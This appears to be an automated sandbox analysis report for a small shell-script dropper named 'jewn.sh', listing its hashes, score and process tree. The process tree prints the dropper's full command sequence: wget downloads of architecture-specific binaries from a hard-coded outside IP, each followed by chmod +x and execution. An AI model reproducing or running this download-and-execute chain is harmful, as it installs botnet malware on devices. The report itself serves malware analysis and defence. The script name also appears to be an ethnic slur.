fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645

Analysis

max time kernel
0s
max time network
123s
platform
linux_mips
resource
debian9-mipsbe-en-20211208
resource tags

arch:mipsimage:debian9-mipsbe-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
08-02-2023 06:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

jewn.sh
Size

1KB
MD5

2097bb27333c25ce9708e90de1604d99
SHA1

5e26a804a9ee8922e12e8eb3aab85cdd83235ebb
SHA256

fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645
SHA512

7417d2e7a5c2266038244ccf0c9efcc6007766e10221f8fc65f74bc5559e060d0d0ee771cd8eaaf9db5269d4cf1af84bc07f65dff60a89d64565a721dd64eb53

Score

5^/10

Malware Config

Signatures

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/jewn.sh	/tmp/jewn.sh	jewn.sh

/tmp/jewn.sh
/tmp/jewn.sh
1⤵
- Writes file to tmp directory
PID:323
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.x86
  2⤵
  PID:324
- /bin/cat
  cat jew.x86
  2⤵
  PID:330
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:331
- ./jewn
  ./jewn
  2⤵
  PID:332
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.mips
  2⤵
  PID:334
- /bin/cat
  cat jew.mips
  2⤵
  PID:336
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:337
- ./jewn
  ./jewn
  2⤵
  PID:338
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.mpsl
  2⤵
  PID:340
- /bin/cat
  cat jew.mpsl
  2⤵
  PID:342
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:343
- ./jewn
  ./jewn
  2⤵
  PID:344
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm4
  2⤵
  PID:346
- /bin/cat
  cat jew.arm4
  2⤵
  PID:348
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:349
- ./jewn
  ./jewn
  2⤵
  PID:350
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm5
  2⤵
  PID:352
- /bin/cat
  cat jew.arm5
  2⤵
  PID:354
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:355
- ./jewn
  ./jewn
  2⤵
  PID:356
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm6
  2⤵
  PID:358
- /bin/cat
  cat jew.arm6
  2⤵
  PID:360
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:361
- ./jewn
  ./jewn
  2⤵
  PID:362
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm7
  2⤵
  PID:364
- /bin/cat
  cat jew.arm7
  2⤵
  PID:366
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:367
- ./jewn
  ./jewn
  2⤵
  PID:368
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.ppc
  2⤵
  PID:370
- /bin/cat
  cat jew.ppc
  2⤵
  PID:372
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:373
- ./jewn
  ./jewn
  2⤵
  PID:374
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.m68k
  2⤵
  PID:376
- /bin/cat
  cat jew.m68k
  2⤵
  PID:378
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:379
- ./jewn
  ./jewn
  2⤵
  PID:380
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.sh4
  2⤵
  PID:382
- /bin/cat
  cat jew.sh4
  2⤵
  PID:384
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-5734ea4df52c4afdabc78bd11d29746e-systemd-timesyncd.service-Uwjp3M
  2⤵
  PID:385
- ./jewn
  ./jewn
  2⤵
  PID:386

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads